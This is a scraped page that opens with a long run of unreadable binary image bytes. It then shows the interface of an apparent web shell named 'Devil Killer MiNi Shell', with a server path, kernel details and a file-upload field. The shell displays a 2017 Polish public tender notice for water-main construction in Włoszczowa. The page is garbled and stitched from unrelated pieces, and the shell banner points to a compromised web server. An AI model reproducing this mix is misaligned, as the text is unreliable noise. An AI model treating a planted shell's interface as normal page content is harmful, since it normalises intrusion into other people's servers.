JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170405/59362-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.wzwik-wloszczowa.pl' target='_blank'>http://www.wzwik-wloszczowa.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 59362 - 2017
              z dnia 2017-04-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Włoszczowa: ZADANIE Nr 1: Budowa sieci wodociągowej wraz z przyłączami do granic posesji w ul. Wigury we Włoszczowie; 
ZADANIE Nr 2: Budowa przyłącza wodociągowego na os. Tartak we Włoszczowie
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Włoszczowski Zakład Wodociągów i Kanalizacji sp. z o.o., krajowy numer identyfikacyjny
              260733356, ul.
              Wiejska 
              55,
              29-100 
              Włoszczowa, woj.
              świętokrzyskie, państwo
              Polska, tel.
              +48413943680, e-mail
              oczyszczalnia.wloszczowa@wp.pl, faks
              +48413943680.
              <br />
              Adres strony internetowej (URL): http://www.wzwik-wloszczowa.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Sp. z o.o.</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.wzwik-wloszczowa.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie pod adres:<br />
                Adres:
                <br />Włoszczowski Zakład Wodociągów i Kanalizacji Sp. z o.o., ul. Sienkiewicza 43, 29-100 Włoszczowa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ZADANIE Nr 1: Budowa sieci wodociągowej wraz z przyłączami do granic posesji w ul. Wigury we Włoszczowie; 
ZADANIE Nr 2: Budowa przyłącza wodociągowego na os. Tartak we Włoszczowie
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>ZADANIE Nr 1:
Budowa sieci wodociągowej z przyłączami do granic posesji w ul. Wigury we Włoszczowie, której zakres obejmuje:

wykonanie sieci wodociągowej zlokalizowanej w działce 5160  ul. Wigury na odcinku od ul. Pocztowej do ul. Kilińskiego i 3635/2  włączenie do istniejącej sieci wodociągowej i przejście pod jezdnią w ul. Pocztowej. 
siec wodociągowa z rur PE SDR 17 PN 10  90 długość 100,60 m,
przyłącza wodociągowe z rur PE  40    4 szt. o łącznej długości 6,70 m
przyłącza wodociągowe z rur PE  63  4 szt. o łącznej długości 7,1 m
przejścia pod ulicą Pocztową i Wigury przewiertem  4 szt.
hydranty ppoż. nadziemne  80  1 szt. 
zasuwy wodociągowe żeliwne  80   4 szt.
zasuwa wodociągowa   50   1 szt.
zasuwa wodociągowa   40   4 szt.
Tyczenie geodezyjne obiektów budowlanych,
Opracowanie projektu organizacji ruchu i uzyskanie wymaganych decyzji na zajęcie pasa drogowego (drogi gminne nr ew. działki 5160, 3635/2) w celu prowadzenia robót wraz              z uiszczeniem naliczonych opłat za zajęcie pasa drogowego na czas prowadzenia robót. 
Roboty ziemne (wykopy ) z odwozem urobku,
Rozbiórkę i odtworzenie istniejącej nawierzchni jezdni, wjazdów na posesję, chodników,
Umocnienie pionowych ścian wykopów z rozbiórką,
Próby szczelności i dezynfekcja,
Podsypka rurociągów piaskiem wraz z dowozem piasku,
Obsypka rurociągów piaskiem wraz z dowozem piasku,
Inwentaryzacja geodezyjna obiektów budowlanych z wyszczególnieniem rodzajów, długości i ilości wykonanego uzbrojenia  wersja papierowa w 3 egz. i wersja elektroniczna,
Zasypka wykopów piaskiem (wraz z dowozem piasku) warstwami z zagęszczeniem gruntu do wymaganego współczynniki zagęszczenia,
Dokładne uporządkowanie i rekultywacja terenu robót (z doprowadzeniem do stanu sprzed realizacji inwestycji).
Wykonawca wodociągu ma obowiązek na 10 dni przed podjęciem prac ziemnych zawiadomić Biuro Społeczeństwa Informacyjnego o terminie podjęcia prac i zapewnić nadzór nad prowadzonymi robotami ziemnymi w zbliżeniu z rurociągami światłowodowymi, które zostały ułożone w 2014 r.
UWAGA: Wykonany jest odcinek z rur PE fi 90 mm o dł. 3,5 m w ul. Wigury                                  z włączeniem w wodociąg w ul. Kilińskiego, zakończony kołnierzem ślepym.

ZADANIE Nr 2:
Budowa przyłącza wodociągowego na os. Tartak we  Włoszczowie
Których zakres  rzeczowy obejmuje:
Budowę przyłącza wodociągowego na działce drogowej o nr. ewid. 5090 obr. 09 Włoszczowa. Miejsce włączenia do istniejącej sieci nastąpi na działce o nr. ewid. 5097/22 obr. 09 Włoszczowa.  Planowane przedsięwzięcie będzie polegać na budowie  przyłącza wodociągowego zasilanego z istniejącej sieci wodociągowej  110                            i zakończono hydrantem przeciwpożarowym zlokalizowanym w poboczu drogi oraz zasuwą. Włączenie do istniejącej sieci nastąpi w obrębie działki prywatnej o nr. ewid. 5097/22 w miejscowości Włoszczowa.
Rury PEHD SDR 11 PN 16  110  długość  334 m
hydranty ppoż. nadziemne  80  3 szt. 
zasuwy wodociągowe żeliwne  80   3 szt.
zasuwy wodociągowe żeliwne  100   2 szt.
Tyczenie geodezyjne obiektów budowlanych,
Opracowanie projektu organizacji ruchu i uzyskanie wymaganych decyzji na zajęcie pasa drogowego (droga gminna nr ew. działki 5090) w celu prowadzenia robót wraz z uiszczeniem naliczonych opłat za zajęcie pasa drogowego na czas prowadzenia robót. 
Roboty ziemne (wykopy ) z odwozem urobku,
Rozbiórkę i odtworzenie istniejącej nawierzchni jezdni, wjazdów na posesję, chodników
Umocnienie pionowych ścian wykopów z rozbiórką,
Próby szczelności i dezynfekcja
Podsypka rurociągów piaskiem wraz z dowozem piasku,
Obsypka rurociągów piaskiem wraz z dowozem piasku,
Inwentaryzacja geodezyjna obiektów budowlanych z wyszczególnieniem rodzajów, długości i ilości wykonanego uzbrojenia  wersja papierowa w 3 egz. I wersja elektroniczna,
Zasypka wykopów piaskiem (wraz z dowozem piasku) warstwami z zagęszczeniem gruntu do wymaganego współczynniki zagęszczenia,
Dokładne uporządkowanie i rekultywacja terenu robót (z doprowadzeniem do stanu sprzed realizacji inwestycji).

Szczegółowy opis zamówienia, zakres robót i czynności objęte zamówieniem określają:
a)Projekty budowlano  wykonawcze stanowiące załącznik Nr 11 do SIWZ
b)Specyfikacja Techniczna Wykonania i Odbioru Robót  załącznik nr 12 do SIWZ 
c)Przedmiar, który stanowi załącznik nr 13 do SWIZ.


Przedmiary robót, które Zamawiający załączył do SIWZ nie stanowią elementu dokumentacji projektowej. Przedmiary mają znaczenie  orientacyjne i pomocnicze. Wykonawca jest zobowiązany do dokonania własnych ustaleń co do rzeczywistego zakresu robót wymaganego do osiągnięcia  rezultatu i  dokonania ewentualnych uzupełnień lub zmian.
W związku z tym,  zaleca się Wykonawcom dokonanie wizji lokalnej, zbadania miejsca budowy i jego otoczenia, oraz uzyskania potrzebnych informacji dotyczących wykonania przedmiotu zamówienia przed złożeniem oferty przetargowej.

Podstawy formalno-prawne wykonania.
Roboty objęte zamówieniem realizowane są na podstawie:
1)Dla Zadania 1  ostateczna decyzja pozwolenia na budowę Nr 37/2014 znak AB-IV.6740.6.37.2014 z dnia 07.10.2014 r. dla sieci wodociągowej z przyłączami do granic posesji, na terenie obejmującym nieruchomości nr ewid. 5160; 3635/2 położone w ob. ew. 05 Włoszczowa  miasto;
2)dla Zadania 2  na podstawie art. 29a Ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2016 r. poz.  290 ze zm.)


<br /><br /><b>II.5) Główny kod CPV: </b>45231300-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający zastrzega sobie prawo do udzielenia zamówień do 30 % , o których mowa z art. 67 ust. 1 pkt 6 ustawy. Zamówienia będą szczególnie polegały na budowie sieci wodociągowej z odcinkami łączącymi.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                OKREŚLENIE WARUNKÓW: Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 10.2. SIWZ - Zamawiający w tym zakresie nie stawia żadnych wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W postępowaniu może wziąć udział wykonawca, który jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                          z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 50.000,00 zł. (dot. jednego zadania).<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                -Wykonawca musi posiadać doświadczenie w realizacji budowy sieci wodociągu lub sieci kanalizacyjnej. Wartość wykonanej roboty budowlanej powinna wynosić minimum 50 000,00 zł brutto. Na potwierdzenie ww. warunku wykonawca winien wykazać  wykonanie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 1 roboty odpowiadającej swoim rodzajem robotom stanowiącym przedmiot zamówienia, tj. sieci wodociągowej lub sieci kanalizacyjnej, potwierdzonych dokumentem, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej         i prawidłowo ukończone  Wykonawca przedkłada informację zgodnie z wzorem, załącznik nr 8 do SWIZ. 
Uwaga: 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunek określony w pkt. 11 ppkt 11.1. ust. 2 lit. c tiret pierwsze SIWZ spełnia przynajmniej jeden z wykonawców na podstawie co najmniej jednego zamówienia (umowy) albo w ramach oddzielnych (odrębnych) zamówień (umów), albo spełniają łącznie wszyscy wykonawcy w ramach oddzielnych (odrębnych) zamówień (umów).  
Wykonawca samodzielnie ubiegający się o udzielenie niniejszego zamówienia musi wykazać, że warunek określony w pkt.11 ppkt 11.1. ust. 2 lit. c tiret pierwsze SIWZ spełnia na podstawie przynajmniej jednego zamówienia (umowy) .
Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.

W postępowaniu może wziąć udział wykonawca, który w celu wykonania zamówienia wykaże, że będzie dysponował na czas wykonania zamówienia: 
	kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Wykonawca przedkłada informację zgodnie ze wzorem, załącznik nr 7 do SWIZ.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji                               o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy p.z.p.;
2)zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wy-konawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż                          3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ;
3)zaświadczenie z właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego lub innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym  organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)Oświadczenie wykonawcy o braku wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności.
5)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy p.z.p. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia - rozporządzenie Ministra Rozwoju z dnia 26 lipca 2016 r. (Dz. U. z 2016 r., poz. 1126)  potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości ;
b)	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo zawarł porozumienie, z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ;
c)	dokumenty o których mowa powyżej w pkt. b) powinny być wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert, a w pkt. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub                  w kraju, w którym miejsce zamieszkania mają osoby, których dotyczą dokumenty wskazane nie wydaje się dokumentów, o których mowa w w ppkt. a) i b) , zastępuje się je dokumentem zawierającym oświadczenie, odpowiednio Wykonawcy, ze wskazaniem osób uprawnionych do jego reprezentacji, lub oświadczeniem tych osób, złożonym przed notariuszem lub przed właściwym  ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tych osób  organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego. Przepis pkt. c) stosuje się odpowiednio.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)Wykaz wykonywanych robót, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów określających czy te roboty zostały wykonane lub są wykonywane należycie, przy czym dowody o których mowa są referencje bądź inne dokumenty wystawione przez podmiot , na rzecz którego roboty zostały wykonane, a w przypadku świadczeń ciągłych lub okresowych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca  nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń ciągłych lub okresowych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - Wzór przedmiotowego oświadczenia stanowi załącznik nr 8 do SIWZ; 
